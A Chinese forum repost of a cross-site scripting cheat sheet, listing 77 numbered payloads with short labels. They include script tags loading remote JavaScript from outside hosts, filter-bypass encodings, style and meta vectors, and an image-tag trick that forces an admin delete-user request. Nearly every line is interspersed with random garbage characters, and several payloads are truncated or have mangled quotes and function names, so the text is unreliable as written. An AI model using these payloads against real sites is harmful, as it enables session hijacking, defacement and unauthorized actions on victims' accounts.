貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
6 G1 k/ ?- X x, m2 t& G. ^& I8 f& t7 }$ u s
(1)普通的XSS JavaScript注入
" x8 q. y D' w <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
T% D6 V( [# M1 Q; r8 f+ I2 q& z X* t( m3 P6 U
(2)IMG标签XSS使用JavaScript命令
4 Z8 [3 G; D5 G% F, p; u <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 z* v' E1 V- f" D6 c+ `
8 d# k2 S2 L9 `# }) ?7 j (3)IMG标签无分号无引号0 F6 G/ ~# \6 K- n2 f3 ^! t
<IMG SRC=javascript:alert(‘XSS’)>0 o* J5 w3 w b% e* F {
5 F7 q a; Q; s( w2 f (4)IMG标签大小写不敏感4 M- a: {1 u3 g6 S) V8 H
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! m+ I8 H/ H* \; r# z6 f; S
7 y& }/ P1 N5 `5 H (5)HTML编码(必须有分号)
2 V. |4 f- P8 f. [8 e1 \$ X <IMG SRC=javascript:alert(“XSS”)>
5 O1 ^0 k7 H1 y3 J( b
; G+ O7 w5 P$ e: D5 o. s8 b (6)修正缺陷IMG标签. m$ u$ b! U5 Z' p- ] G) Y
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
; |5 C' c/ L" g+ ?# h( k* `" J v- s) W
(7)formCharCode标签(计算器)
+ ^$ |) h. C1 k <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
* w" M1 X! z: M, o5 V: X' P f/ P4 i* w0 P
(8)UTF-8的Unicode编码(计算器)
) ~7 q/ n5 g1 |* E" A" h <IMG SRC=jav..省略..S')># e$ _2 e: R6 ]
' m" e6 m* P3 u% e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
9 E. X; ^3 u% @8 W& ] <IMG SRC=jav..省略..S')>% y3 Q& v2 Z- t0 I: C' G
- G8 m( t- v7 t; e: n% J9 }9 n3 I
(10)十六进制编码也是没有分号(计算器)
/ U" X M2 s' E. ^2 v, d <IMG SRC=java..省略..XSS')> E" t; l* p: w
& {. Y( ^/ R: k5 c" [9 { (11)嵌入式标签,将Javascript分开1 D! U% I8 N* Y! n& o. u& N$ x
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 x' v9 W# ^0 V' r! `' o0 r; A
- G4 \. l0 K7 X* r4 K8 Q' a( c
(12)嵌入式编码标签,将Javascript分开' K/ Z, ?' [! r& k2 _8 x, j
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 N7 W! r' d- |
" h+ u8 j. V" t+ t9 e5 V (13)嵌入式换行符7 ?& |* z3 C8 v2 y8 F; g: J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, u$ L9 \4 O' N; C: `6 c
* s5 J- f- n1 F8 L (14)嵌入式回车1 ?# {- u; Y) x) x; l% p( }6 Z6 ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>( q. h: x! @! n0 O6 {/ e5 ~
" ]4 {# K* h- d. _# p5 x
(15)嵌入式多行注入JavaScript,这是XSS极端的例子5 _' R% j Y; ?3 @1 t: `
<IMG SRC=”javascript:alert(‘XSS‘)”>
" p# Z: S4 P- T
' e/ z- l) L; J ^4 t7 {. ~ (16)解决限制字符(要求同页面)
3 i; @$ g# T# \* B$ Z/ @8 X <script>z=’document.’</script>
. o; A- G9 D5 B <script>z=z+’write(“‘</script>: @( O! C9 d- {# ?
<script>z=z+’<script’</script>
/ g2 M" U1 D9 s v* q, u <script>z=z+’ src=ht’</script>. T& C% v0 E7 _
<script>z=z+’tp://ww’</script>
& B& H! y/ Q) U- m: m <script>z=z+’w.shell’</script>
& D% w: ^# P. k <script>z=z+’.net/1.’</script>& [- O7 U; `! M) |* }
<script>z=z+’js></sc’</script>" u5 }% K$ R5 Q
<script>z=z+’ript>”)’</script>
1 w0 R' ~ F: b: _ <script>eval_r(z)</script>
4 f1 s) x5 N- _' d9 l& W
1 M- ^$ k) h, m* D) a% g# t4 x (17)空字符4 `" p' r, L6 H- T1 y4 m6 R
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out3 I0 _7 z y: q4 a+ X
8 Y$ _& x! S# W7 f$ e* e8 ~! { (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 t+ @+ _" k) D perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out' l: z. K3 q0 P4 p6 M
. v2 D2 p% K! p) t+ r# K (19)Spaces和meta前的IMG标签
/ x7 z) V& B4 |4 [ <IMG SRC=” javascript:alert(‘XSS’);”>/ u' M, x6 D: t+ a$ ~, B3 M
0 W D" ?3 U/ R, I2 E5 @+ K
(20)Non-alpha-non-digit XSS% c* W! Q; S1 a* X( Q) @) l& @1 ]
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( g5 n7 t! X1 T8 f' m8 L
6 }6 ~3 k. L' G2 y (21)Non-alpha-non-digit XSS to 2
+ _* A. a0 p0 x* H/ t <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>. ~2 a' M0 }, Q" W1 y8 a
/ ^! w% p7 C$ e( |4 b+ v- b. c (22)Non-alpha-non-digit XSS to 3+ [0 Q. C' o' w- ?; s
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>: Q/ @4 R, J$ `8 r A4 V9 h2 D
5 H- [+ I) D+ z8 _7 |4 m+ i9 o
(23)双开括号
1 }; @, x* j2 x; d( P, C <<SCRIPT>alert(“XSS”);//<</SCRIPT>/ [. @; t+ Z- B9 K: u
% M/ O `) m/ p6 g0 R (24)无结束脚本标记(仅火狐等浏览器)
8 N1 s, ]/ Q! G( ^: s$ P8 G9 V <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
5 d" n0 `: u, a0 q: d2 g# B
. @* b' T w; b2 i% H9 G" o (25)无结束脚本标记2( q1 I9 H" {' T* v; _5 b2 t q
<SCRIPT SRC=//3w.org/XSS/xss.js>$ \- B* a, @. C9 ~; [
0 S9 i3 o& x; K0 \9 Z (26)半开的HTML/JavaScript XSS
3 k; E% O% Q* q) Z/ v8 h <IMG SRC=”javascript:alert(‘XSS’)”
+ a2 T- V, M! b2 V$ u* t1 m( p3 V# K. }8 l3 a2 r& S# A. b) d5 }* S
(27)双开角括号& L& o- i$ J& H2 z/ I" C
<iframe src=http://3w.org/XSS.html <
1 R% E4 R$ z) A: W. B
& y. t( \% s) F7 @9 e (28)无单引号 双引号 分号! T' f- Y/ B5 u, Y6 a# C
<SCRIPT>a=/XSS/& D9 B( D0 C7 v3 `7 O) g: @3 w
alert(a.source)</SCRIPT>
- o6 j5 c' ?% t+ H& D9 y" y
4 {5 Z. B7 F' j (29)换码过滤的JavaScript
, D; A# m. g& X \”;alert(‘XSS’);//
) u3 e6 K' s0 N# L- J( y) {6 G4 H" S6 w0 e f0 ^, Q0 b
(30)结束Title标签* \8 j6 u( J4 w# u' i- j
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
2 V- @1 {: G3 d+ d! A' P
! R3 I" c2 ^/ G2 s (31)Input Image1 u9 K4 J! F* n1 ^1 i0 d. x
<INPUT SRC=”javascript:alert(‘XSS’);”>
3 `4 {- B. V9 g0 L6 t, ]8 G
/ Y0 n+ V, E: ^4 a$ G0 Y/ Y+ D* o (32)BODY Image
! L: h. \7 c( P- ~0 `& D$ T0 v# R/ } <BODY BACKGROUND=”javascript:alert(‘XSS’)”>& P; I& g+ h% C% a& G+ T
4 [# q1 P& S1 [2 p7 c2 E
(33)BODY标签, Z# N8 T( R/ s% Z: Q+ S9 O. E2 q
<BODY(‘XSS’)>& B/ O3 F! z! k9 G; J' }3 ]
0 E) V7 y0 B( P (34)IMG Dynsrc$ f! I' T) L/ ?
<IMG DYNSRC=”javascript:alert(‘XSS’)”> _/ K+ w. W& z. |
4 f8 Q0 J& ~9 ^" \, ` P (35)IMG Lowsrc8 O. F. |3 O/ x* g6 F
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
) }- f6 j; g: ^# A! e6 R% B# h! K6 [ E6 |/ R
(36)BGSOUND
/ | w' H, z, x* | <BGSOUND SRC=”javascript:alert(‘XSS’);”>% n3 n3 L6 _2 Q% b9 Z5 S* y
2 w J( {+ B- n- n8 D* Z
(37)STYLE sheet7 T0 t- B7 V* @) U: [: X9 C# A. _* h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 @* q: L" E& Q' h
" \% j; I6 w, Y2 h! x# m; ` (38)远程样式表
3 s9 {, a* u: @( q1 `$ S0 N% p <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
0 J& J! C8 j( E+ d" x# I. z \# M- n+ _1 O1 f0 o
(39)List-style-image(列表式)
0 l6 M+ s2 a7 z$ P, @6 y' V/ E <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 A4 W- I$ I; a2 E/ t# k% n( ~
) M* @9 M3 l1 G9 g7 q% c j) g1 V9 ~
(40)IMG VBscript
& L# ]2 Y9 ?& _# S7 m6 O" { <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
; M; ~$ D6 }* q6 \. `3 y5 {# m
7 q7 W" h/ l5 t1 |+ ?4 Z/ q (41)META链接url
9 [ ? R/ J( l# N1 [/ {) A) M <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
- P/ s& T! ^0 q6 \% d- |' {% F" w& G! `/ \& Y
(42)Iframe" V/ g$ ]! S" i* u7 K8 Q+ \
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>- v9 R9 Z/ i# M
( V! ~- x% T* m7 H- k8 y7 P (43)Frame9 U9 Q+ ?1 u& L/ w4 @9 n
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>) e4 l0 b/ r/ V
4 b! q) x j9 u, V8 B, ]
(44)Table* X, t4 ^8 |* @. Y8 ]5 b6 N
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>: ^. V1 \) ^$ B# R, X2 y
( U5 P/ Z% a% T2 G- y: j (45)TD* C! ^. n5 v8 |. g3 l4 v9 v
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>: s6 A# Q; U8 L! e- ^4 R
5 }7 j4 I. O: l (46)DIV background-image8 |# ^" A4 Q' e
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ Q0 l5 B# e% U3 t
/ d, b( F2 ?, O6 v- P& |# G, X
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)! [% }$ |, e0 c) x2 l0 T% ~; W
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ }) ], Q2 ^8 P& g6 |" M
* b8 Y$ |. A2 `# C* N (48)DIV expression$ R6 G0 [+ `$ z0 V( T! o$ N
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
( X) C1 V ?5 @6 d* S+ F0 O6 H5 A% O+ T% R2 V+ K8 j
(49)STYLE属性分拆表达
( H" C) i' f) r; V1 V+ T% B; V C <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>& K5 T- c3 L' b) e; g& H
+ f- l3 L* U1 A1 n8 Z7 J: b3 N! u
(50)匿名STYLE(组成:开角号和一个字母开头)( i& l& R S5 R- t+ u! j6 L1 [
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
9 C7 S2 ^1 |3 }1 q+ O! o& a4 d8 x4 S5 t+ D7 j
(51)STYLE background-image
6 T, a! s1 R! Y* g7 G6 M# l8 o" D" y <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>' F& g* c# R5 [
( a) r6 L" T* o! J4 I/ d
(52)IMG STYLE方式
# E% }. j2 p: \2 \0 D exppression(alert(“XSS”))’>! B1 b- K/ I, O# `5 c+ }9 m9 f. c1 w
3 ^1 H6 f% J3 ]( b4 `5 W
(53)STYLE background- k1 Q6 s" [+ N# i& ? B8 k7 C+ ~
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>( G. b1 k! y- d$ @6 F* @1 v
Y, A3 m8 F3 A+ ?. d. B (54)BASE
8 u; G7 y" H* _: E, b <BASE HREF=”javascript:alert(‘XSS’);//”>
* _/ J% z/ @0 d1 `, g. n
9 u+ r5 s6 K* p' ?3 f (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS3 A. \' l9 I. M3 O9 o5 h
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
$ i Q' T5 I" {6 L% [( O9 t9 J; z! \: r; M/ z! y
(56)在flash中使用ActionScrpt可以混进你XSS的代码
# E) p, x u' n: w$ ? a=”get”;) a# \6 t: l$ R9 U, q. C
b=”URL(\”";
6 G9 j/ h% d" }7 z( P c=”javascript:”;
Y" t @# f2 z' @) M; r- ^9 L d=”alert(‘XSS’);\”)”;
& e3 {) T$ Y. L) A eval_r(a+b+c+d);1 Z. F" G* B1 Z6 M
/ e- s, s0 k, o) Z p5 t7 b# O (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 C( I) R0 p9 W <HTML xmlns:xss>
/ s4 X1 m( X# p/ b/ i. \, x) O M8 V2 ?! K <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>9 y8 y3 J3 I8 k( o, W
<xss:xss>XSS</xss:xss>
3 F: A6 ]/ x0 H6 N# @+ z* o </HTML>
; w4 \2 V0 k0 `$ \7 v6 E Z/ h9 A. e7 N( i5 O; U& Y" \
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ E% `( H& p; `* R6 M
<SCRIPT SRC=””></SCRIPT>
: \' M6 m3 g* k/ ^! m& B
! S$ S6 n6 _$ [' q6 a7 L/ y (59)IMG嵌入式命令,可执行任意命令3 E, `2 S# W0 b
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# B0 x5 F( Q7 E4 i$ s J
2 d W7 R. l) |) @ (60)IMG嵌入式命令(a.jpg在同服务器): B) ^; q9 J3 u* E; N( [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
: J, u5 W# |% G" L+ {7 I
( \* P( }* r, T$ X (61)绕符号过滤( ~! S0 d! z4 p1 P( u
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 ?0 w" v* |0 Y* c* x9 I) Q. C
/ C6 Q8 i# G1 R/ a( _. v3 U# i0 ^* `# O (62). k/ ]5 M5 A7 }5 v0 u
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 I9 G0 \; c$ y! ?: M& K
8 p O, U, G" S; n W
(63)
! ~+ p+ f. l" y; N! B% ^0 T <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' }; ^ Y3 D, j" K: d% E9 L- q- {% a% i$ z3 E
(64)( G0 T3 r' S' [5 z
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
; A5 X. e8 b9 N8 M1 q
/ f& A8 C: n; N- u; g4 ` (65)
! `3 a. `4 j* k+ R4 }0 Z0 F <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT># [- H: a k1 \1 U2 z
6 P5 F- E! d( f" `" ^4 C (66)
5 @% f# r& @1 r/ Z2 p& p+ y <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 j4 `9 ~) M5 r, A; A: }
! |4 d( R2 {; I1 U7 V r: s; J (67)2 H1 |0 I: \. t" g) v2 i* x: H
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
3 T' A. m9 ]* c$ N- K, \% ~
6 v( w" Y* \, y! T' d# s (68)URL绕行
& D( p3 X" w: p4 V2 t! J <A HREF=”http://127.0.0.1/”>XSS</A>( w- ?3 b! s2 _ b
4 E. u' x k- Y ]' c- h
(69)URL编码
/ O7 W: @0 B( F* c- s; l5 h <A HREF=”http://3w.org”>XSS</A>- c+ J$ W- w m; p1 ^+ E6 d( c
& q* d( W; v1 P+ f
(70)IP十进制$ x6 x) A& F" R9 m; H
<A HREF=”http://3232235521″>XSS</A>/ a- p; H# N& u: \. D
6 Y* Z) A& H- P* e* y% [" y
(71)IP十六进制
0 G' c* V8 V B <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
, [& ~1 v% N0 V" K! e K) a. @' e$ V' H% P; G' Z+ Z& j
(72)IP八进制6 O8 A; [: F* O
<A HREF=”http://0300.0250.0000.0001″>XSS</A>4 S7 n: P* [0 A7 V" P% N
& V D s4 r. [1 R5 ?9 W& j1 m8 F; _ (73)混合编码5 m2 @1 u, n" R. ~' ^
<A HREF=”h. G/ c* q, M2 S$ I
tt p://6 6.000146.0×7.147/”">XSS</A>
% ~; O. |8 d1 v& x* z Z E8 G+ ^6 q" J: F/ h
(74)节省[http:]
) b8 i- r+ T- T) x <A HREF=”//www.google.com/”>XSS</A>1 m$ B( _+ G7 Y
: K; S: I2 t+ k: ^' i (75)节省[www]
% y( u' [. W. K' f <A HREF=”http://google.com/”>XSS</A>1 s" v: |; V5 P$ ?8 u; X
J- {7 [4 U; `! ~" n( f1 e (76)绝对点绝对DNS
( Q9 o6 |8 C: a3 A: R <A HREF=”http://www.google.com./”>XSS</A>
4 }4 U7 Z; A/ ~2 f/ H$ {* b; g6 g% `8 L# T- T0 P: n
(77)javascript链接
4 `3 A6 e2 @) t4 x. J# d) ~+ Y <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |